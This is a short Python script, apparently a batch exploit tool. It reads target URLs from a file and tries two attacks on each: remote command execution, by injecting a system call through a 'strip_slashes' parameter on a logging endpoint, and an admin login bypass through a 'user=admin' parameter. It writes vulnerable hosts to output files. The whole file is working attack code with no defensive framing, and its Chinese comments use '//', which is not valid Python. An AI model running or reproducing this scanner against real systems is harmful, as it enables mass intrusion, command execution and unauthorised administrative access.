import requests
from requests.packages import urllib3

urllib3.disable_warnings()
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36'
}


//远程命令执行漏洞
def exploit(url):
    url = url + "/tool/log/c.php?strip_slashes=system&host=echo%20%22dacade%22"
    req = requests.get(url, verify=False, headers=headers, timeout=8)
    result = req.text
    if "dacade" in result:
        print("[*]" + url + " is success!")
        with open('success_excute.txt', 'a') as f1:
            f1.write(url + '\n')
    else:
        pass


//任意用户登录漏洞
def exploit2(url):
    url = url + "/ui/login.php?user=admin"
    req = requests.get(url, verify=False, headers=headers, timeout=8)
    result = req.text
    if "/ui/static/js/app" in result:
        print("[*]" + url + " login is success!")
        with open('success_login.txt', 'a') as f2:
            f2.write(url + '\n')
    else:
        pass


if __name__ == '__main__':
    num = 1
    with open('url.txt', 'r') as f:
        lines = f.readlines()
        for line in lines:
            num += 1
            url = line.strip()
            print(f'Now,the number is:  {num}')
            try:
                exploit(url)
                exploit2(url)
            except:
                pass
    print("[*]Exploit Finished")
